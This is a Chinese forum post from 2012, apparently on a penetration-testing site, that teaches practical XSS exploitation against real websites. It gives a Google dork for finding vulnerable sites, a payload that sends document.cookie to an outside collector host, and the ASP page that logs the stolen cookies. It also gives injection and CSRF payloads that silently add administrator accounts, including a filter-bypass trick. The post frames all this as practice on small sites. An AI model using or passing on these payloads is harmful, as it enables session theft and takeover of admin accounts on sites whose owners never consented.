中国网络渗透测试联盟

标题: 实战xss漏洞利用 [打印本页]
作者: admin    时间: 2012-9-13 17:08
标题: 实战xss漏洞利用
前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为: : H+ R0 _! G4 H  ?: i# X, u

; C5 q$ t; E% J- H, Bhttp://tieba.baidu.com/f?kz=1069007239
2 \' L8 t4 D' e8 g6 p
2 S6 e7 {% u% {+ q( Z* e这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。( j2 o$ R  ]1 x3 H5 }, C

# @; {4 Y: y9 o7 g1 }' v) s* m8 q3 ]但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。
* h" ?" Q1 e/ r7 @5 q# |: q% J
( b+ h  J! Z' r7 g5 @我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。- V- }1 I; C! d+ t5 D% L, ^! {/ ^6 W
4 d4 D  B$ @! e5 e! |6 r
这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。5 Q: V: }7 h3 v6 Y+ J. C. P
& E' H( P- C, S! H+ [
好了,废话不多说了,一起来看文章吧。$ ^% ~$ m% S. {3 K7 x

# H7 s9 j% U+ ]-------------------------------------------------------------------8 G- [1 ~: S5 u; l8 |4 I
: y8 F+ M9 j9 g% Y8 Q+ I0 `" X
首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。
5 R+ `+ Q$ i& t4 f6 \/ H$ M  g- w( w5 P& x
7 [% _5 @8 e6 A; D. ?6 h( q
* e7 E! c4 F' E4 O( [' @
再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:3 [0 p" c8 a' C2 m& {
6 n! y  F% \  A% S
" V2 D) M& s! S% d4 B4 I! X

3 b8 n9 Y, m: X; G- u这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是8 g, l% D2 Q& T8 a- a
1:让目标访问已跨站的网址,然后这个网址执行脚本
# v$ B0 f0 a9 k4 S2:然后跳转到你已经写好专门用来收集Cookie的网址
8 x- N! `* r- v+ q
% t7 u) B8 P0 j3 B具体实现方法:4 D9 D2 E/ K) B1 p7 H' o
先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>
0 I6 T; |4 d* ]7 k这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。
8 [) O; F+ a) l4 o: M1 `
$ u' I% r7 w. V& D( d这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:
$ D9 Z) z: ], L" ?9 a
" C, T3 b7 v6 r5 c3 H8 i<html>
( ?2 M0 M9 x( s2 r* g( |7 z<title>xx</title>
& |. R; g$ Y* l' @5 }<body>
  p! ~. |; i' D0 ]<%1 v1 c& e  t$ M" z$ \
testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中! P0 l, P& B+ W) ~! q- |
msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
6 r1 Y: z8 Z, o, a$ fset fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象( U6 O3 t: v, [* @
set thisfile = fs.OpenTextFile(testfile,8,True,0)
2 w6 S/ B" m9 n8 ?( \thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
% [! r( ?! p( b4 o- kthisfile.close   //关闭
. I4 I- ?5 w* H( H0 ?; O$ `set fs = nothing
$ D7 u! M7 P! a/ J; P0 G%>7 s" N3 G$ E: _: A6 B- x9 _% |
</body>) h" p8 `4 ^, S# o5 B8 Z
</html>8 |7 H' R! m- |. @" u5 x4 @

7 s0 [( g+ v* m然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:
7 w% k1 P8 Q6 }9 A; I( h9 O
7 }' h$ ]5 Y/ d 4 }; F$ a( p1 n$ e7 b
! w* F4 d# }. {' k: \

; q9 |, w+ c% @" `8 p5 ]拿出来看看,呵呵,Cookie到手:
- b. ?+ j& V4 A
( W9 D  K3 b0 Z9 W  L7 P+ I + G! K+ g6 c5 ~  h

$ k3 ~0 [6 ~$ J& B: k) h本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~; U4 O/ i- H/ U8 u4 N- U: s. j! J
" n* J1 V* g' n9 Z+ F& j
PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。
7 Q4 A5 T0 J) Z* |$ T. E/ p; G' }% b! @  _( k+ N7 s$ m
-------------------------------------------------------------------
$ q( Y6 g# Z7 J. X1 }5 W$ Q, n  U$ G9 x+ l
下面是我对这个帖子的回复,也一起贴过来吧:
4 W2 m, A# L8 f/ Y; q+ [
9 p' l  S3 F4 H$ @0 `3 \说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。
- l1 g) J( B: m0 L7 {( Z/ a8 o8 x- q0 b4 p6 ?( ~9 {6 y
但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。3 d1 ?8 d9 U( ]" X
再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。
0 Y* R$ U- Z+ G; d/ T9 J1 `2 i- _+ U4 W4 {& b* E
在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:
7 ?4 Y* k+ ]/ I' V: [: n7 d4 S
) }& l- V/ |" p/ C" J3 p, Chttp://user.qzone.qq.com/673116767/blog/1252452536
: _4 `3 h2 Q9 e, M$ o" c2 z7 b7 l* I) W
一般发现一个xss漏洞后要做的基本上就是这些:0 Z% O) h/ d" J* y
- O  y7 H% _  G
1.  伪造请求  使用$_REQUEST或$_GET# ?+ K  |% E. z9 Y( }+ L* p0 J

$ M1 {  {8 g5 O首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:7 L  v3 [$ L( N
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />& L5 m- C( E! c% A5 J' q# ?# d
当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。
7 W: k3 D6 e4 @$ g2 r) u. G6 X6 ^! }; d4 m: B* E$ j' R; n/ l. |
如果是可视文本编辑器,可以尝试使用输入:
  R. _' v" U: j) ?/ h" q# Dhttp://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')  ]0 O/ E- V( ~5 L* R( ~
这样最终会构造出:
% P" n9 l5 T1 V# {<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
: o- B' V" P' p- [总之要举一反三。
' J5 ~' W; q3 H/ B. L$ I! P/ n- _0 u& m( Z9 Y7 K4 m% a5 U) q
2. 伪造请求  使用$_POST
& O( n+ k. e0 I. u
* t7 D, k- [) o' d2 Z9 p3 h& @. p当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:
) c+ R! O( {$ [<sc/*xss*/ript type="text/javascript">
: U, `4 {- N& |4 X# c3 k4 Zvar aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");
5 k9 T, u4 Q; G9 baj.open("POST", "/admin/admin_add.asp", false);
' N" S! E! I" K  p- n1 r; P9 K8 [var postdata = 'name=xxx&psd=yyy';
$ ?' R1 Z+ ^/ I2 S1 V1 Baj.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); " I/ Z. Y5 \  B) `( j8 e" N: N
aj.send(postdata);8 J/ L$ Q6 u  k
</scr/*xss*/ipt>
0 [' i, D. m# i! A( |) X/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。  H/ T( U! R' N8 H2 v
2 \% k7 ], g5 e( k% ~4 j( b9 n
3. 跨站伪造请求 使用$_GET 或 $_REQUEST3 t7 ]: C( y) `+ n% Z

% w; k4 _! r% A0 b与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片
; D# r" G: K# l6 b/ o<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>% H& ?. W" |: S  O2 M1 v
然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。
# @( v6 W, E$ K# a" T+ T+ j' {/ i  p
4.跨站伪造请求 使用$_POST(0day)
8 f9 \! D8 x1 I$ Y( S+ u7 x2 V* \# C& t5 }! [! o1 X
如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。
9 S, _( c- `. ~3 r1 F# G( ]9 H+ E. V2 b. B! I& w
但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。
# z- S% |2 B( S8 g3 E7 s& a/ o
- r- N' S9 @% h  h$ K; q# G总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。
# ^: U; H9 X& J' B/ z
" M0 K0 ?4 Y2 qOK,该说的都说完了,Over。
) v3 B( C6 K# b



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2